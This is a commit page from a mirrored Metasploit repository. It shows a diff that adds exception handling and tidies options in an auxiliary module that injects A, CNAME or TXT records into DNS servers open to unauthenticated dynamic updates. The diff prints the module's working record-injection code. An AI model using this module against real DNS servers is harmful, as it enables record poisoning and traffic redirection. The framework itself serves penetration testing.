infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add more exception handling, fix tidy rules

bug/bundler_fix
KINGSABRI 2016-10-14 00:32:04 +03:00 committed by Brent Cook
parent ce124e6090
commit b618e5ca6f
1 changed files with 34 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

63
modules/auxiliary/scanner/dns/dyn_dns_update.rb
View File

@ -3,7 +3,6 @@
# This module requires Metasploit: http://metasploit.com/download # This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'msf/core'
require 'dnsruby' require 'dnsruby'
class MetasploitModule < Msf::Auxiliary class MetasploitModule < Msf::Auxiliary
@ -30,25 +29,25 @@ class MetasploitModule < Msf::Auxiliary
], ],
'DefaultAction' => 'ADD' 'DefaultAction' => 'ADD'
) )
register_options(
[
OptString.new('DOMAIN', [true, 'The domain name']),
OptAddress.new('NS', [true, 'The vulnerable DNS server IP address']),
OptString.new('INJECTDOMAIN', [true, 'The name record you want to inject']),
OptAddress.new('INJECTIP', [true, 'The IP you want to assign to the injected record']),
OptEnum.new('TYPE', [true, 'The record type you want to inject.', 'A', ['A', 'CNAME', 'TXT', 'MX']])
], self.class)
register_advanced_options([
OptString.new('TXTSTRING', [true, 'The string to be injected with TXT record', 'w00t'])
])
deregister_options( 'RHOST', 'RPORT' )
register_options([
OptString.new('DOMAIN', [true, 'The domain name']),
OptAddress.new('NS', [true, 'The vulnerable DNS server IP address']),
OptString.new('INJECTDOMAIN', [true, 'The name record you want to inject']),
OptAddress.new('INJECTIP', [true, 'The IP you want to assign to the injected record']),
OptEnum.new('TYPE', [true, 'The record type you want to inject.', 'A', ['A', 'CNAME', 'TXT']])
])
register_advanced_options([
OptString.new('TXTSTRING', [true, 'The string to be injected with TXT record', 'w00t'
])
])
deregister_options('RHOST', 'RPORT')
end end
def a_record(action) def a_record(action)
# Send the update to the zone's primary master. # Send the update to the zone's primary master.
resolver = Dnsruby::Resolver.new({:nameserver => datastore['NS']}) resolver = Dnsruby::Resolver.new({:nameserver => datastore['NS']})
# Create the update packet.
update = Dnsruby::Update.new(datastore['DOMAIN']) update = Dnsruby::Update.new(datastore['DOMAIN'])
case case
when action == 'ADD' when action == 'ADD'
@ -75,7 +74,7 @@ class MetasploitModule < Msf::Auxiliary
end end
end end
end end
#
def cname_record(action) def cname_record(action)
resolver = Dnsruby::Resolver.new({:nameserver => datastore['NS']}) resolver = Dnsruby::Resolver.new({:nameserver => datastore['NS']})
update = Dnsruby::Update.new(datastore['DOMAIN']) update = Dnsruby::Update.new(datastore['DOMAIN'])
@ -159,21 +158,27 @@ class MetasploitModule < Msf::Auxiliary
end end
end end
end end
# Run
def run def run
print_status("Sending DNS query payload...") begin
case print_status("Sending DNS query payload...")
when datastore['TYPE'] == 'A' case
a_record(action.name) when datastore['TYPE'] == 'A'
when datastore['TYPE'] == 'CNAME' a_record(action.name)
cname_record(action.name) when datastore['TYPE'] == 'CNAME'
when datastore['TYPE'] == 'TXT' cname_record(action.name)
txt_record(action.name) when datastore['TYPE'] == 'TXT'
when datastore['TYPE'] == 'MX' txt_record(action.name)
print_warning("Not implemented yet.") # MX does not work yet
mx_record(action.name) # when datastore['TYPE'] == 'MX'
else # mx_record(action.name)
print_error "Invalid Record Type!" else
print_error "Invalid Record Type!"
end
rescue Dnsruby::OtherResolvError
print_error("Connection Refused!")
rescue Dnsruby::DecodeError
print_error("None DNS protocol answer!, Make sure it's a DNS service")
end end
end end